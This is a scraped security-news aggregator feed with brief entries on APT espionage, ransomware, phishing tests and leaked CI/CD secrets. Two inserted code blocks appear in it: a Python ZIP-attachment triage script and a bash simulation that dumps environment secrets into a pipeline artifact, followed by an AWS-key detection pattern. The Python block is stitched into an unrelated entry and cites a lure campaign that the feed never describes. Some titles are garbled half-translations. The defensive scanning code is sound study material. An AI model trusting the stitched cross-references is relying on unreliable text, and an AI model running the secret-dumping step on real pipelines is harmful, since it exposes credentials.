2024-05-22T14:00:35+00:00 https://www.hackread.com/criminal-ip-security-solution-aws-marketplace-integration/ www.secnews.physaphae.fr/article.php?IdArticle=8504906 False Threat None 3.0000000000000000
Mandiant - Mandiant's security blog. IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders
Mandiant Intelligence is tracking a growing trend among China-nexus cyber espionage operations where advanced persistent threat (APT) actors utilize proxy networks known as "ORB networks" (operational relay box networks) to gain an advantage when conducting espionage operations. ORB networks are akin to botnets and are made up of virtual private servers (VPS), as well as compromised Internet of Things (IoT) devices, smart devices, and routers that are often end of life or unsupported by their manufacturers. Building networks of compromised devices allows ORB network administrators to easily grow the size of their ORB network with little effort and create a constantly evolving mesh network that can be used to conceal espionage operations.
By using these mesh networks to conduct espionage operations, actors can disguise external traffic between command and control (C2) infrastructure and victim environments, including vulnerable edge devices that are being exploited via zero-day vulnerabilities. These networks often use rented VPS nodes in combination with malware designed to target routers so they can grow the number of devices capable of relaying traffic within compromised networks. Mandiant assesses with moderate confidence that this is an effort to raise the cost of defending an enterprise's network and shift the advantage toward espionage operators by evading detection and complicating attribution.
Mandiant believes that if network defenders can shift the current enterprise defense paradigm away from treating adversary infrastructure like indicators of compromise (IOCs) and instead toward tracking ORB networks like evolving entities akin to APT groups, enterprises can contend with the rising challenge of ORB networks in the threat landscape.
IOC Extinction and the Rise of ORB Networks
The cybersecurity industry has reported on the APT practice of ORB network usage in the past, as well as on the functional implementation of these networks. Less discussed are the implications of broad ORB network usage by a multitude of China-nexus espionage actors, which has become more common over recent years. The following are three key points and paradigm-shifting implications about ORB networks that require enterprise network defenders to adapt the way they think about China-nexus espionage actors:
ORB networks undermine the idea of "Actor-Controlled Infrastructure": ORB networks are infrastructure networks administered by independent entities, contractors, or administrators within the People's Republic of China (PRC). They are not controlled by a single APT actor. ORB networks create a network interface, administer a network of compromised nodes, and contract access to those networks to multiple APT actors that will use the ORB networks to carry out their own distinct espionage and reconnaissance. These networks are not controlled by the APT actors using them, but rather are temporarily used by these APT actors, often to deploy custom tooling more conventionally attributable to known China-nexus adversaries.
ORB network infrastructure has a short lifesp
2024-05-22T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8504765 False Malware,Tool,Vulnerability,Threat,Prediction,Cloud,Commercial APT 15,APT 5,APT 31 3.0000000000000000
GoogleSec - Firm Security Blog. On Fire Drills and Phishing Tests. […] have continued to improve steadily, and "tests" have evolved into announced, advanced training and posted evacuation plans. In this blog, we will analyze the modern practice of Phishing "Tests" as a cybersecurity control as it relates to industry-standard fire protection practices. Modern "Phishing tests" strongly resemble the early "Fire tests". Google currently operates under regulations (for example, FedRAMP in the USA) that require us to perform annual "Phishing Tests." In these mandatory tests, the Security team creates and sends phishing emails to Googlers, counts how many interact with the email, and educates them on how to "not be fooled" by phishing. These exercises typically collect reporting metrics on sent emails and how many employees "failed" by clicking the decoy link. Usually, further education is required for employees who fail the exercise. Per the FedRAMP pen-testing guidance doc: "U
2024-05-22T13:15:23+00:00 http://security.googleblog.com/2024/05/on-fire-drills-and-phishing-tests.html www.secnews.physaphae.fr/article.php?IdArticle=8511665 False Tool,Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?). MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks. An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy keylogger malware in attacks targeting entities in Africa and the Middle East. Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The first-ever compromise dates back to 2021. "This
2024-05-22T13:11:00+00:00 https://thehackernews.com/2024/05/ms-exchange-server-flaws-exploited-to.html www.secnews.physaphae.fr/article.php?IdArticle=8504569 False Malware,Threat None 3.0000000000000000
Bleeping Computer - American magazine. Microsoft's new Windows 11 Recall is a privacy nightmare. Microsoft's announcement of the new AI-powered Windows 11 Recall feature has sparked a lot of concern, with many thinking that it has created massive privacy risks and a new attack vector that threat actors can exploit to steal data. [...]
2024-05-22T12:02:24+00:00 https://www.bleepingcomputer.com/news/microsoft/microsofts-new-windows-11-recall-is-a-privacy-nightmare/ www.secnews.physaphae.fr/article.php?IdArticle=8504837 False Threat None 3.0000000000000000
Palo Alto Network - Vendor site. AI in Cyber Is Here to Stay - How to Weather This Sea Change. AI is transforming cybersecurity, automating tasks and enabling better custom threat detection. AI impacts jobs and cloud services.
2024-05-22T12:00:46+00:00 https://www.paloaltonetworks.com/blog/2024/05/ai-in-cyber-is-here-to-stay/ www.secnews.physaphae.fr/article.php?IdArticle=8504697 False Threat,Cloud None 3.0000000000000000
Zimperium - cyber risk firms for mobile. The Multifaceted Threat Landscape of Mobile Security. In this blog, Zimperium shares how the multifaceted threat landscape of mobile security expands beyond the SS7 protocol.
2024-05-22T12:00:00+00:00 https://www.zimperium.com/blog/the-multifaceted-threat-landscape-of-mobile-security/ www.secnews.physaphae.fr/article.php?IdArticle=8504698 False Threat,Mobile None 3.0000000000000000
AlienVault Lab Blog - AlienVault is a major defensive player in IOCs. Digital Legacies: Securing Data in the Afterlife
[…] keep our money online, and store precious memories and documents in the cloud. But what happens to this vast digital footprint when we're gone? The persistence of our online presence long after we've drawn our final breaths has given rise to a new frontier in data management: the digital afterlife. As more of our personal information becomes digitized, it has become important to thoughtfully plan for the handling of this data. Gone are the days when we could neatly bequeath our earthly possessions to loved ones; now, we must grapple with the complex web of passwords, accounts, and digital assets that make up our modern-day legacies. With personal data strewn across the internet, the risks of identity theft, privacy breaches, and unauthorized access to our digital lives will only continue to grow. Navigating this complex landscape of digital legacies is a delicate balance that requires thoughtful consideration.
The Scope of Digital Legacies
When we think of legacies in a traditional sense, we imagine physical assets: houses, heirlooms, vehicles, cash, etc. However, virtual assets like social media accounts, email inboxes, online bank accounts, multimedia libraries, and cloud-based storage also represent critical components of a person's digital estate. These virtual assets not only hold sentimental value in the form of memories, messages, and cherished media, but they may also contain sensitive financial and personal information that requires careful consideration after the owner's passing. Imagine an elderly relative of yours has been dabbling in some deep-in-the-money options, and his account lies unprotected now that no one has official access to it. What's more, many asset protection strategies and plans don't consider digital accounts and non-traditional securities as something to be protected upon the passing of the owner. In such situations, the risk of losing your relative's wealth becomes all too real.
The Challenges of Managing Digital Legacies
While digital assets have transformed how we think about personal legacies, they have also introduced a complex web of challenges that we must navigate with great care.
Legal Considerations
Questions of ownership and access rights can be fuzzy, as traditional estate laws often fail to keep pace with the rapid evolution of technology. Additionally, different online platforms have varied terms of service that can complicate the execution of a will or the desires of the deceased's family. Further complicating matters is the patchwork of privacy and data protection regulations that vary by jurisdiction, making it challenging to en
2024-05-22T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/digital-legacies-securing-data-in-the-afterlife www.secnews.physaphae.fr/article.php?IdArticle=8504632 False Threat,Legislation,Cloud None 2.0000000000000000
BlackBerry - Hardware and software manufacturer. Transparent Tribe Targets Indian Government, Defense, and Aerospace Sectors Leveraging Cross-Platform Programming Languages. As part of our continuous threat hunting efforts across the Asia-Pacific region, BlackBerry discovered Pakistani-based APT group Transparent Tribe targeting the government, defense and aerospace sectors of India.
2024-05-22T08:01:00+00:00 https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors www.secnews.physaphae.fr/article.php?IdArticle=8504897 False Threat APT 36 3.0000000000000000
Netskope - Netskope is an American software company providing an IT security platform. Netskope Threat Coverage: Microsoft Quick Assist Ransomware Attacks
Introduction
Microsoft has recently highlighted the abuse of the remote support tool Quick Assist in sophisticated social engineering attacks leading to ransomware infections. This blog post summarizes the threat and recommends a mitigation strategy for Netskope customers.
Attack Chain
An unknown adversary group is exploiting Quick Assist in targeted social engineering campaigns. These attacks typically […]
2024-05-21T20:48:29+00:00 https://www.netskope.com/blog/netskope-threat-coverage-microsoft-quick-assist-ransomware-attacks www.secnews.physaphae.fr/article.php?IdArticle=8504287 False Ransomware,Tool,Threat None 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?). SolarMarker Malware Evolves to Resist Takedown Attempts with Multi-Tiered Infrastructure. The persistent threat actors behind the SolarMarker information-stealing malware have established a multi-tiered infrastructure to complicate law enforcement takedown efforts, new findings from Recorded Future show. "The core of SolarMarker's operations is its layered infrastructure, which consists of at least two clusters: a primary one for active operations and a secondary one likely
2024-05-21T18:37:00+00:00 https://thehackernews.com/2024/05/solarmarker-malware-evolves-to-resist.html www.secnews.physaphae.fr/article.php?IdArticle=8504065 False Malware,Threat,Legislation None 2.0000000000000000
RiskIQ - cyber risk firms (now Microsoft). Ransomware gang targets Windows admins via PuTTy, WinSCP malvertising
2024-05-21T18:21:28+00:00 https://community.riskiq.com/article/cbf8691b www.secnews.physaphae.fr/article.php?IdArticle=8504244 False Ransomware,Malware,Threat,Prediction None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?). Five Core Tenets Of Highly Effective DevSecOps Practices. One of the enduring challenges of building modern applications is to make them more secure without disrupting high-velocity DevOps processes or degrading the developer experience. Today's cyber threat landscape is rife with sophisticated attacks aimed at all different parts of the software supply chain, and the urgency for software-producing organizations to adopt DevSecOps practices that deeply
2024-05-21T17:03:00+00:00 https://thehackernews.com/2024/05/five-core-tenets-of-highly-effective.html www.secnews.physaphae.fr/article.php?IdArticle=8504002 False Threat None 2.0000000000000000
Dark Reading - Informationweek Branch. Picking the Right Database Tech for Cybersecurity Defense. Graph and streaming databases are helping defenders deal with complex, real-time threat and cybersecurity data to find weak points before attackers do.
2024-05-21T16:34:03+00:00 https://www.darkreading.com/cybersecurity-analytics/picking-right-database-tech-cybersecurity-defense www.secnews.physaphae.fr/article.php?IdArticle=8504411 False Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?). Researchers Uncover Flaws in Python Package for AI Models and PDF.js Used by Firefox. A critical security flaw has been disclosed in the llama_cpp_python Python package that could be exploited by threat actors to achieve arbitrary code execution. Tracked as CVE-2024-34359 (CVSS score: 9.7), the flaw has been codenamed Llama Drama by software supply chain security firm Checkmarx. "If exploited, it could allow attackers to execute arbitrary code on your system,
2024-05-21T15:52:00+00:00 https://thehackernews.com/2024/05/researchers-uncover-flaws-in-python.html www.secnews.physaphae.fr/article.php?IdArticle=8503971 False Threat None 2.0000000000000000
Bleeping Computer - American magazine. Western Sydney University data breach exposed student data. Western Sydney University (WSU) has notified students and academic staff about a data breach after threat actors breached its Microsoft 365 and SharePoint environment. [...]
2024-05-21T15:39:43+00:00 https://www.bleepingcomputer.com/news/security/western-sydney-university-data-breach-exposed-student-data/ www.secnews.physaphae.fr/article.php?IdArticle=8504255 False Data Breach,Threat None 2.0000000000000000
RiskIQ - cyber risk firms (now Microsoft). Security Brief: Artificial Sweetener: SugarGh0st RAT Used to Target American Artificial Intelligence Experts
#### Targeted Geolocations
- United States
#### Targeted Industries
- Education
- Higher Education
- Government Agencies & Services
## Snapshot
Proofpoint has detected a SugarGh0st RAT campaign active during May 2024 aimed at US organizations involved in artificial intelligence, including those in academia, private industry, and government.
## Description
The campaign uses a remote access trojan (RAT) variant of the older Gh0stRAT. Historically, Gh0stRAT has been used by Chinese-speaking threat actors to target users in Central and East Asia. In this campaign, the threat actors used a free email account to send AI-themed spearphishing emails that instructed targets to open an attached zip file. Upon opening the file, an LNK shortcut file deployed a JavaScript dropper that then installed the SugarGh0st payload, employing techniques such as base64 encoding, ActiveX tool abuse, and multi-stage shellcode execution to establish persistence and exfiltrate data.
Proofpoint notes that it has observed a relatively small number of campaigns involving SugarGh0st RAT since it was first detected in 2023. Previous targets include a US telecommunications company, an international media organization, and a South Asian government organization. Proofpoint assesses that these campaigns are extremely targeted: this most recent campaign appears to have targeted fewer than 10 individuals, all of whom are connected to a single US artificial intelligence organization.
## References
[Security Brief: Artificial Sweetener: SugarGh0st RAT Used to Target American Artificial Intelligence Experts](https://www.proofpoint.com/us/newsroom/news/us-ai-experts-targeted-sugargh0st-rat-campaign). Proofpoint (accessed 2024-05-21)
2024-05-21T15:18:47+00:00 https://community.riskiq.com/article/a67a621d www.secnews.physaphae.fr/article.php?IdArticle=8504155 False Tool,Threat None 3.0000000000000000
Bleeping Computer - American magazine. Bitbucket artifact files can leak plaintext authentication secrets. Threat actors were found breaching AWS accounts using authentication secrets leaked as plaintext in Atlassian Bitbucket artifact objects.
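The two lure archives described above, the UAC-0006 ZIP carrying .IMG disk images and macro-enabled .ACCDB databases, and the SugarGh0st ZIP carrying an LNK shortcut, share a triage step that a mail gateway or analyst script can perform before anything is opened. The following Python is an added example, not Proofpoint's, CERT-UA's or Microsoft's code: it walks a ZIP in memory, flags members by extension, and also checks file-type magic so a shortcut renamed to .pdf or an executable inside a nested archive is still caught. The archive and its members are constructed here with minimal synthetic headers, not real malware.

```python
"""Triage an e-mail attachment archive for the lure patterns described above.

Added example, not Proofpoint's, CERT-UA's or Microsoft's code. It walks a ZIP in memory,
flags members by extension, and also sniffs file-type magic so a shortcut renamed to .pdf or
a disk image with a double extension is still caught. The archive below is constructed;
members carry only minimal synthetic headers, not real malware.
"""
import io
import zipfile
from dataclasses import dataclass
from typing import Optional

# Extensions used by the two campaigns (.img/.accdb and .lnk) plus usual dropper companions.
RISKY_EXTENSIONS = {".img", ".iso", ".lnk", ".accdb", ".exe", ".js", ".jse", ".vbs", ".hta", ".scr"}

# Shell link (.lnk) header: HeaderSize 0x4C followed by LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk little-endian layout.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C000000000000046")
# ISO 9660 primary volume descriptor: "CD001" at byte 0x8001 (sector 16, after the type byte).
ISO_SIGNATURE, ISO_OFFSET = b"CD001", 0x8001
PE_MAGIC = b"MZ"
ACCDB_MAGIC = b"\x00\x01\x00\x00Standard ACE DB"   # Access 2007+ (.accdb) file header
ZIP_MAGIC = b"PK\x03\x04"


@dataclass(frozen=True)
class Hit:
    member: str
    reason: str


def sniff(data: bytes) -> Optional[str]:
    """Identify the member by magic bytes; None means nothing of interest was recognised."""
    if data.startswith(LNK_MAGIC):
        return "lnk"
    if len(data) >= ISO_OFFSET + len(ISO_SIGNATURE) and data[ISO_OFFSET:ISO_OFFSET + 5] == ISO_SIGNATURE:
        return "iso"
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(ACCDB_MAGIC):
        return "accdb"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return None


def extension(name: str) -> str:
    """Lower-cased final extension with its dot, or '' when the name has none."""
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def triage(archive: bytes, depth: int = 0) -> list[Hit]:
    """Return one Hit per suspicious member; nested ZIPs are descended two levels deep."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name, data = info.filename, zf.read(info)
            ext, kind = extension(name), sniff(data)
            if ext in RISKY_EXTENSIONS:
                hits.append(Hit(name, f"risky extension {ext}"))
            elif kind in {"lnk", "iso", "pe", "accdb"}:
                hits.append(Hit(name, f"{kind} content disguised as {ext or 'no extension'}"))
            if kind == "zip" and depth < 2:
                hits.extend(Hit(f"{name}/{h.member}", h.reason) for h in triage(data, depth + 1))
    return hits


def build_sample() -> bytes:
    """Constructed lure: ISO image, Access database, LNK renamed to .pdf, nested ZIP with an EXE."""
    iso = bytes(ISO_OFFSET) + ISO_SIGNATURE + b"\x01"      # zero sectors, then the descriptor
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("setup.exe", PE_MAGIC + b"\x00" * 62)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("invoice_2024-05.img", iso)
        zf.writestr("contract.accdb", ACCDB_MAGIC + b"\x00" * 16)
        zf.writestr("AI_conference_agenda.pdf", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("readme.txt", b"Please review the attached documents.\n")
        zf.writestr("archive.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for hit in triage(build_sample()):
        print(f"{hit.member}: {hit.reason}")
```

Magic-byte checks are what make the extension list worth having: the same lure delivered as `agenda.pdf` would pass an extension-only filter, and the nested ZIP case covers the common trick of one more layer of wrapping.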
[...]]]> 2024-05-21T15:05:46+00:00 https://www.bleepingcomputer.com/news/security/bitbucket-artifact-files-can-leak-plaintext-authentication-secrets/ www.secnews.physaphae.fr/article.php?IdArticle=8504284 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch Russie & apos; s turla apt abuse msbuild pour livrer la porte dérobée de Tinyturla<br>Russia&apos;s Turla APT Abuses MSBuild to Deliver TinyTurla Backdoor A threat campaign luring users with malicious documents related to human rights and public notices is aimed at giving the Russia-backed threat group access to victims' systems for cyber-espionage purposes.]]> 2024-05-21T14:43:37+00:00 https://www.darkreading.com/cyberattacks-data-breaches/russia-turla-apt-msbuild-tinyturla-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8504106 False Threat None 3.0000000000000000 Security Through Education - Security Through Education Attention à ces escroqueries en matière de pause d'été<br>Watch Out for These Summer Break Scams As the temperatures rise and summer approaches, so do the schemes of cybercriminals looking to exploit unsuspecting individuals. Whether you’re […]]]> 2024-05-21T14:00:39+00:00 https://www.social-engineer.org/general-blog/watch-out-for-these-summer-break-scams/ www.secnews.physaphae.fr/article.php?IdArticle=8510752 False Threat None 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Trous dans votre bitbucket: pourquoi votre pipeline CI / CD fuit des secrets<br>Holes in Your Bitbucket: Why Your CI/CD Pipeline Is Leaking Secrets   While investigating recent exposures of Amazon Web Services (AWS) secrets, Mandiant identified a scenario in which client-specific secrets have been leaked from Atlassian\'s code repository tool, Bitbucket, and leveraged by threat actors to gain unauthorized access to AWS. This blog post illustrates how Bitbucket Secured Variables can be leaked in your pipeline and expose you to security breaches.  
Background

Bitbucket is a code hosting platform provided by Atlassian and is equipped with a built-in continuous integration and continuous delivery/deployment (CI/CD) service called Bitbucket Pipelines. Bitbucket Pipelines can be used to execute CI/CD use cases like deploying and maintaining resources in AWS. Bitbucket includes an administrative function called "Secured Variables" that allows administrators to store CI/CD secrets, such as AWS keys, directly in Bitbucket for easy reference from pipeline steps.

CI/CD Secrets: CI/CD secrets serve as the authentication and authorization backbone within CI/CD pipelines. They provide the credentials required for pipelines to interact with platforms like AWS, ensuring pipelines possess the appropriate permissions for their tasks. Secrets are often extremely powerful and are beloved by attackers because they present an opportunity for direct, unabated access to an environment. Maintaining confidentiality of secrets while balancing ease of use by developers is a constant struggle in securing CI/CD pipelines.

Bitbucket Secured Variables: Bitbucket provides a way to store variables so developers can quickly reference them when writing pipeline steps. Additionally, Bitbucket offers an option to declare a variable as a "secured variable" for any data that is sensitive. A secured variable is designed such that, once its value is set by an administrator, it can no longer be read in plain text through the Bitbucket UI. This structure allows developers to make quick calls to secret variables without exposing their values anywhere in Bitbucket. Unless…

Exporting Secrets from Bitbucket in Plain Text

CI/CD pipelines are designed just like the plumbing in your house. Pipes, valves, and regulators all work in unison to provide you with reliable, running water. CI/CD pipelines are a complicated orchestration of events to accomplish a specific task.
In order to accomplish this, these pipelines are highly proficient at packaging and deploying large volumes of data completely autonomously. As a developer, this creates countless possibilities for automating work, but, as a security professional, it can be a cause for anxiety and heartburn. Perhaps it's a line of code with a hardcoded secret sneaking into production. Maybe it's a developer accidentally storing secrets locally on their machine. Or maybe, as we have seen in recent investigations, it's a Bitbucket artifact object containing secrets for an AWS environment being published to publicly available locations like S3 buckets or company websites. Bitbucket secured variables are a convenient way to store secrets in Bitbucket for quick reference by developers; however, they come with one concerning characteristic: they can be exposed in plain text through artifact objects. If a Bitbucket variable, secured or not, ends up in a file that a step publishes with the artifacts: keyword, the result will generate a .txt file with 2024-05-21T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets/ www.secnews.physaphae.fr/article.php?IdArticle=8504062 False Tool,Threat,Studies None 3.0000000000000000 Global Security Mag - French news site Artificial intelligence: deepfakes, audio synchronization and social media hacking, online dangers explode in 2024 - Malwares 2024-05-21T12:51:32+00:00 https://www.globalsecuritymag.fr/intelligence-artificielle-deepfakes-synchronisation-audio-et-piratage-des.html www.secnews.physaphae.fr/article.php?IdArticle=8504031 False Threat None 2.0000000000000000 Global Security Mag - French news site New privacy research pegs AI as a rival threat to cybercrime Special Reports
New privacy research pegs AI as a rival threat to cybercrime – More than half of developers believe AI will almost equal cybercrime in terms of risk to data privacy – Developers concerned about current regulatory frameworks, with 98% advocating for proactive measures to address future data privacy concerns - Special Reports
2024-05-21T11:50:53+00:00 https://www.globalsecuritymag.fr/new-privacy-research-pegs-ai-as-a-rival-threat-to-cybercrime.html www.secnews.physaphae.fr/article.php?IdArticle=8504034 False Threat None 2.0000000000000000
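The Mandiant item above (Holes in Your Bitbucket) describes the leak but the feed cuts off before the mechanics. The following is an added example, not code from Mandiant, Atlassian, or any other post in this feed. It assumes only what Bitbucket documents: a secured variable is handed to a pipeline step as an ordinary environment variable, and any path a step lists under `artifacts:` in `bitbucket-pipelines.yml` is uploaded as-is. The secret values are the placeholder credentials from the AWS documentation, the `env > file` step is a constructed stand-in for the debugging habit that causes the leak, and `scan_artifacts` is a hypothetical pre-publish guard, not an Atlassian feature.

```shell
#!/usr/bin/env bash
# Added example, not code from the Mandiant post or from Atlassian. It simulates
# the leak described above: a Bitbucket secured variable reaches a pipeline
# step as a plain environment variable, a step writes it into a file, and that
# file is published because its path is listed under `artifacts:`. It then
# shows a pre-publish guard that fails the step when an artifact contains an
# AWS-style access key ID or the literal value of a known secret.
set -eu

# Constructed stand-ins for two Bitbucket secured variables. These are the
# placeholder credentials from the AWS documentation, not live credentials.
export AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"

# The leak: a debugging habit such as dumping the whole environment into a file
# inside the artifact directory. Bitbucket masks secured variables in the build
# log, but a file written by the step is just bytes and is uploaded unchanged.
leaky_step() {
  local outdir="$1"
  mkdir -p "$outdir"
  env > "$outdir/env.txt"               # secured variables are plain text here
  echo "build ok" > "$outdir/build.log"
}

# The same step with the habit removed: nothing derived from the environment
# is written into the artifact directory.
safe_step() {
  local outdir="$1"
  mkdir -p "$outdir"
  echo "build ok" > "$outdir/build.log"
}

# Hypothetical pre-publish guard, to run as the last command of any step that
# declares artifacts. Scans every regular file in the artifact directory for
#   (a) the documented shape of an AWS access key ID (AKIA or ASIA followed by
#       16 upper-case alphanumerics) and
#   (b) the literal value of the secret this pipeline knows about.
# Returns 0 when clean and 1 when anything was found, so `set -e` aborts the
# step before the artifact is uploaded.
scan_artifacts() {
  local outdir="$1"
  local hit=0
  local f
  for f in "$outdir"/*; do
    [ -f "$f" ] || continue
    if grep -Eq '(AKIA|ASIA)[A-Z0-9]{16}' "$f"; then
      echo "secret pattern found in artifact: $f" >&2
      hit=1
    fi
    if grep -Fq -- "$AWS_SECRET_ACCESS_KEY" "$f"; then
      echo "secret value found in artifact: $f" >&2
      hit=1
    fi
  done
  return "$hit"
}

# Stand-alone run: the leaky step is caught, the safe step passes.
demo() {
  local leaky safe
  leaky="$(mktemp -d)"
  safe="$(mktemp -d)"
  leaky_step "$leaky"
  if scan_artifacts "$leaky"; then
    echo "unexpected: leaky artifacts passed"
  else
    echo "leaky artifacts blocked before upload"
  fi
  safe_step "$safe"
  if scan_artifacts "$safe"; then
    echo "safe artifacts passed"
  fi
  rm -rf "$leaky" "$safe"
}

demo
```

In a real pipeline the guard would be the final `script:` line of the step, pointed at the directory that `artifacts:` names (for example `scan_artifacts "$BITBUCKET_CLONE_DIR/dist"`, where `dist` is a hypothetical artifact path). The pattern check catches keys that arrived through a route you did not anticipate; the literal-value check catches the specific variables you know are secrets even when they do not look like AWS keys.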
HackRead - Chercher Cyber Iranian State Hackers Partner Up for Large-Scale Attacks, Report By Deeba Ahmed Check Point researchers have detailed a new Iranian state-sponsored hacker group called Void Manticore, partnering with Scarred Manticore, another threat group based in Iran's Ministry of Intelligence and Security. This is a post from HackRead.com Read the original post: Iranian State Hackers Partner Up for Large-Scale Attacks, Report
2024-05-21T11:37:37+00:00 https://www.hackread.com/iranian-state-hackers-partner-up-for-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8504004 False Threat APT 34 2.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine Over 60% of Network Security Appliance Flaws Exploited as Zero Days Rapid7 found that more mass compromise events arose from zero-day vulnerabilities than from n-day vulnerabilities in 2023 2024-05-21T11:30:00+00:00 https://www.infosecurity-magazine.com/news/network-security-flaws-exploited/ www.secnews.physaphae.fr/article.php?IdArticle=8504001 False Vulnerability,Threat None 3.0000000000000000 AlienVault Lab Blog - AlienVault is a major defensive player in IOCs Beyond Silicon Valley: Where Cybersecurity Pros Are Heading in an AI-Dominant Future significantly impact their jobs, according to a survey by the International Information System Security Certification Consortium (ISC2). With only 35% of the respondents having already witnessed AI’s effects on their jobs, there’s no question that there is a level of uncertainty regarding the future within the industry and how much of a role AI will play. From the negatives to the silver lining, AI has the potential to greatly transform the cybersecurity landscape in the coming years — a reality that can lead many Silicon Valley professionals to expand their horizons. A Brief Outlook AI is rapidly transforming the modern cybersecurity landscape, according to Station X. “It is enhancing the capabilities of bad actors to perform more sophisticated attacks while empowering cyber security professionals to elevate their defenses.” To highlight a few of many advantages, AI provides immediate access to an extensive knowledge base, serves as a reliable copilot for task execution, automates the protection of systems, and can even augment the workflow of professionals to increase efficiency, Station X points out.
Andrew Shikiar, executive director at FIDO Alliance, expands on the threat of AI going forward in 2024. “The threat posed by AI to cybersecurity is real, but there is certainly a ‘hype’ element in how big a share of highly sophisticated new AI attacks and data breaches are going to pose.” Phishing, deep fakes, and disinformation are all identified as threats that AI brings to the table. In regard to phishing, SecurityWeek notes that if AI-as-a-service does emerge in 2024, it will lead to an increase in phishing incidents. Ivan Novikov, founder and CEO at Wallarm warns: “These AI models can provide novice malicious actors with advanced capabilities… which were once the domain of more skilled hackers.” The rise of AI can leave many feeling hopeless regarding the outlook of cybersecurity jobs, with the worry that technological advancements will eliminate valuable positions in the coming years. However, Station X goes on to point out that currently, there is a high demand for skilled cyber professionals in the job market, with an expectation that by 2025 there will be 3.5 million unfilled cybersecurity jobs “due to a lack of skilled professionals and a growing need to secure more and more systems.” A silver lining AI will undoubtedly have a profound impact on sectors like cybersecurity, though there is a silver lining to keep in mind. Infosecurity Magazine dives deeper into the report by ISC2, which reveals that more than four in five respondents (82%) agree that AI will improve job efficiency for cyber professionals (it’s further noted that 42% strongly agree with this statement). 
Furthermore, the report found that more than half of respondents 2024-05-21T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/beyond-silicon-valley-where-cybersecurity-pros-are-heading-in-an-ai-dominant-future www.secnews.physaphae.fr/article.php?IdArticle=8503946 False Tool,Vulnerability,Threat None 2.0000000000000000 Global Security Mag - French news site Zscaler ThreatLabz 2024 Risk Report: faced with a surge in exploits, 78% of companies intend to adopt a Zero Trust strategy within the next 12 months - Investigations 2024-05-21T09:21:24+00:00 https://www.globalsecuritymag.fr/risk-report-2024-de-zscaler-threatlabz-face-a-la-multiplication-des-exploits-78.html www.secnews.physaphae.fr/article.php?IdArticle=8503944 False Threat None 3.0000000000000000 Global Security Mag - French news site Rapid7 Releases Attack Intelligence Report Examining High-Impact Attacks and Vulnerability Data Trends Special Reports
Rapid7 Releases Attack Intelligence Report Examining High-Impact Attacks and Vulnerability Data Trends Multi-year trend shows more zero-day vulnerabilities leading to mass compromise events - Special Reports
2024-05-21T09:14:08+00:00 https://www.globalsecuritymag.fr/rapid7-releases-attack-intelligence-report-examining-high-impact-attacks-and.html www.secnews.physaphae.fr/article.php?IdArticle=8503945 False Vulnerability,Threat,Prediction None 2.0000000000000000
ProofPoint - Cyber Firms 74% of CISOs Believe that People Are Their Company's Biggest Vulnerability, 2024 Voice of the CISO Report Reveals 2024-05-21T05:00:13+00:00 https://www.proofpoint.com/us/blog/ciso-perspectives/fourth-annual-voice-of-the-ciso-people-risk-concern www.secnews.physaphae.fr/article.php?IdArticle=8503911 False Ransomware,Tool,Vulnerability,Threat,Studies,Cloud None 4.0000000000000000 ComputerWeekly - Computer Magazine The Security Interviews: What is the real cyber threat from China? 2024-05-21T04:00:00+00:00 https://www.computerweekly.com/news/366585774/The-Security-Interviews-What-is-the-real-cyber-threat-from-China www.secnews.physaphae.fr/article.php?IdArticle=8503880 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch OpenSSF Siren to Share Threat Intelligence for Open Source Software The Siren email mailing list will focus on operational impact and response and act as a central location to provide information about threats and necessary post-disclosure activities. 2024-05-21T00:52:11+00:00 https://www.darkreading.com/application-security/openssf-siren-to-share-threat-intelligence-for-open-source-software www.secnews.physaphae.fr/article.php?IdArticle=8503996 False Threat None 3.0000000000000000 WatchGuard - Hardware and software vendor Seattle Kraken, the American hockey franchise, adopts WatchGuard's Unified Security Platform® solution 2024-05-21T00:00:00+00:00 https://www.watchguard.com/fr/wgrd-news/press-releases/la-franchise-de-hockey-americaine-kraken-de-seattle-adopte-la-solution www.secnews.physaphae.fr/article.php?IdArticle=8509306 False Threat,Cloud None 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been identified as being behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice and Karma, respectively. Cybersecurity firm Check Point is 